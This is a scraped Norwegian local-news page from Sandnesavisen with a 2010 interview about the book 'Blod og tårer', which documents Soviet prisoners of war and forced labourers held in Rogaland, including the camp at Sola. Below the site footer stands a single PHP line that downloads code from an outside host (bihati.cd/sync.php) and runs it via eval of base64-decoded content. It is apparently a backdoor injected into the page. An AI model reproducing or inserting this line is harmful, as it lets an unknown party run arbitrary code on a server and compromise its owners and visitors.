Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Sovjetiske fanger i Rogaland
Skrevet av Atle Stava   
lrdag 20. november 2010

De fleste forbinder sovjetiske krigsfanger med Nord-Norge. Forfatterne Atle Skarsten og Michael Stokke har med boka ”Blod og tårer” foretatt en omfattende dokumentasjon av et betydelig antall krigsfanger og sivile tvangsarbeidere også i Rogaland.

Sovjetiske fanger i Rogaland
Forfatterne Atle Skarsten (bilde) og Michael Stokke har med boka ”Blod og tårer” foretatt en omfattende dokumentasjon av et betydelig antall krigsfanger og sivile tvangsarbeidere også i Rogaland.

- Det er skrevet veldig lite om disse fangene. Det som er skrevet er mer generelt om hele landet, og med hovedfokus på Nord-Norge. Folk på min alder herfra i distriktet kan gjerne spørre: Hva, var det krigsfanger i Rogaland? Vi regner med at det kan ha vært om lag 3 500 krigsfanger og sivile tvangsarbeidere her i området, sier Skarsten.

- Det er første gang en bok tar for seg et helt fylke, og behandler temaet fra A til Å. Vi følger nemlig fangene fra de blir tatt til fange på Østfronten, via transporten til Norge, oppholdet i fangeleirer her i distriktet, og helt til frigjøringen. Vi tar for oss alle sidene ved opphodet her, ikke minst kontakten med lokalbefolkningen, forklarer den historieinteresserte forfatteren, som til daglig er pilot i SAS.

Kontakt med gjenlevende
De to forfatterne har brukt et omfattende sett av kilder for å sette sammen boken, ikke minst muntlige overleveringer:

- Vi har vært i kontakt med rundt femten fanger som fortsatt lever og bor i Russland. Det aller meste har gått på brev. Så i disse tilfellene har vi faktisk fulgt fangene helt fram til i dag. Det har vært utrolig å få høre historien deres. Tre-fire har vært på besøk i Saudasjøen hvor det var en fangeleir, forklarer Skarsten. Han sier videre at det var to typer fanger:

- De som var soldater og ble tatt til fange var krigsfanger. Disse ble uten tvil utsatt for den verste behandlingen. Så var det sivile tvangsarbeidere som ble ført inn i det tyske riket fra land tyskerne okkuperte. Tanken var at de alle skulle utføre et arbeid for okkupantene. Tyskerne stilte faktisk opp med lastebiler utenfor kinoen eller kirken i en landsby i Ukraina og bare plukket opp folk når de kom ut. De yngste kunne være 12-15 år.

Leirer i Rogaland
- De første 200 fangene kom til Rogaland i slutten av september i 1941. De aller fleste kom fra Stettin i Polen. De ble først ført til Stavanger, så måtte de gå til Sola. De var i utgangspunktet i svært dårlig forfatning, og ble innlosjert i en glissen løe. På toppen av alt gikk vi inn i den verste vinteren i manns minne med temperaturer ned mot 23 minus.

I mars var førti av fangene døde, og tyskerne skjønte at helsetilstanden var for dårlig. De skulle jo bruke fangene til arbeid på tyske forsvarsanlegg. Da ble det bygget en stor leir der som Sola videregående skole ligger i dag. Bildet på bokens omslag er fra denne leiren. Dette var en typisk fangeleir, nesten som de du ser på film, med dobbel inngjerding, vakttårn og lyskastere, forklarer Skarsten.

Henrettet
- Det som er litt spesielt er at jeg har gått på Sola videregående skole, og jeg har spilt fotball på banen der hvor fangeleiren lå. Ingen fortalte oss at det hadde ligget en stor fangeleir på området. Her ble fanger faktisk stilt opp foran massegraver og skutt. Mange blir overrasket når de hører at det har skjedd akkurat her. Men når vi begynte å grave litt, så viste det seg at det var mange som husker disse krigsfangene, og mange sitter på helt unike og spennende historier, sier Skarsten.

- På et halvt år tok tyskerne til sammen 3,7 millioner fanger, og det var helt overveldende for dem. De hadde ikke kapasitet til å ta hånd om dem, og fangene fikk derfor en enormt dårlig behandling. Dødsprosenten var så høy som 95 prosent, forklarer forfatteren. Noen av de utallige fangeskjebnene er nå altså samlet mellom to permer i boken ”Blod og tårer”.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Papirutgaver
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));